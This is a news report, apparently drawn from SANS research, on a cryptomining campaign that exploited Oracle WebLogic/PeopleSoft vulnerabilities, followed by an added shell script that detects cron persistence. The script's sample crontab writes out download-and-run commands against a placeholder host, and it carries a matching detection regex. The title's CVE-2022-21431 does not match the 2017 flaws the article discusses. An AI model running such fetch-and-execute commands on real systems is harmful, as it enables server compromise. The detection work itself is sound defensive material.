Hackers use Oracle Application Server bug to mine cryptocurrencies

CVE-2022-21431

Security researchers report that attackers are exploiting a vulnerability in Oracle PeopleSoft/WebLogic application servers to mine digital currency at scale. Johannes Ullrich, Director of Research at the SANS Institute, released a report noting that one attacker has earned at least 611 Monero, worth about $226,000 at current prices.

Ullrich said the attacker used an exploit script published at the end of December 2017 by Lian Zhang, a Chinese security researcher, for a vulnerability (CVE-2017-3506). After Oracle released the patch for CVE-2017-3506 in April 2017, a further vulnerability, CVE-2017-10271, was found because the fix was incomplete.

Oracle Application Server


Ullrich said that shortly after the PoC was published, it was reported that attackers were using it to install cryptocurrency mining programs on servers hosted by Digital Ocean, GoDaddy, Verizon Business Services and Athenix.

Ullrich said the attacks are not targeted; victims are spread across the globe. Once an exploit is public, even unsophisticated attackers can compromise WebLogic/PeopleSoft servers. The attackers installed legitimate Monero mining software on 722 vulnerable WebLogic and PeopleSoft systems. Many of these run on public cloud services: over 140 on Amazon AWS, about 30 on Oracle's public cloud, and a handful on other hosting and cloud providers.

Because the public exploit code for CVE-2017-3506 makes scanning for vulnerable systems simple, any publicly exposed, unpatched Oracle web application server can quickly fall victim to these attacks. However, because the mining scripts kill "java" processes on the target servers (which takes down the WebLogic service itself), the mining activity was quickly noticed by researchers.

The installer used by the attacker in this Monero campaign is a simple bash script that finds and kills any other mining programs already present, then creates a cron job that downloads and launches the mining tool.

Ullrich reminded victims that simply patching the server and removing the mining program is not enough to restore it, as sophisticated attackers may use more advanced techniques to hide their foothold. The persistence mechanism seen in this case is a cron job, but that does not rule out other, harder-to-detect persistence mechanisms used to keep long-term control of the compromised host.
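As an added example (not from the SANS report or the attacker's script), the following POSIX shell check looks for the cron persistence pattern described above, a crontab entry that fetches remote content and runs it, so a responder can verify the cleanup Ullrich recommends. It scans the usual system and per-user crontab locations and first runs over a constructed sample crontab with a placeholder host; the regex and file paths are assumptions, not indicators from the report.

```shell
#!/bin/sh
# Added example, not from the SANS report: flag crontab entries that fetch and
# run remote content, the persistence pattern described for the installer above.

# A fetch tool piped straight into a shell, or a fetch chained (&&, ;) into
# chmod, a shell, or execution of a path: typical download-and-run entries.
SUSPICIOUS_CRON_RE='(curl|wget)[^|]*[|][[:space:]]*(ba)?sh|(curl|wget).*(&&|;)[[:space:]]*(chmod|(ba)?sh |\./|/tmp/|/dev/shm/)'

# Print the non-comment lines of a crontab file that match the pattern.
list_suspicious() {
    [ -r "$1" ] || return 0
    grep -Ev '^[[:space:]]*(#|$)' "$1" | grep -E "$SUSPICIOUS_CRON_RE"
}

# Number of suspicious entries in a file (0 for an unreadable or absent file).
count_suspicious() {
    [ -r "$1" ] || { echo 0; return 0; }
    grep -Ev '^[[:space:]]*(#|$)' "$1" | grep -Ec "$SUSPICIOUS_CRON_RE"
}

# Walk the usual system and per-user crontab locations; print hits per file.
scan_system_crons() {
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/* /var/spool/cron/crontabs/*; do
        [ -f "$f" ] || continue
        if [ "$(count_suspicious "$f")" -gt 0 ]; then
            echo "== $f"
            list_suspicious "$f"
        fi
    done
}

# Constructed sample crontab (placeholder host, not a real indicator) to show
# what the check flags: entries 2 and 4 match, the rest are ordinary jobs.
SAMPLE_CRON=$(mktemp)
printf '%s\n' \
    '# constructed sample' \
    '*/5 * * * * curl -fsSL http://placeholder.invalid/x.sh | sh' \
    '0 * * * * root /usr/bin/apt-get update' \
    '@reboot wget -q -O /tmp/m http://placeholder.invalid/m && chmod +x /tmp/m && /tmp/m' \
    '30 2 * * * /usr/local/bin/backup.sh' > "$SAMPLE_CRON"
echo "suspicious entries in sample: $(count_suspicious "$SAMPLE_CRON")"   # 2
list_suspicious "$SAMPLE_CRON"
rm -f "$SAMPLE_CRON"

scan_system_crons
```

A hit is a starting point for investigation, not proof of compromise; also compare the job's download target and the files it launches against what the server is expected to run.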

Reference: SANS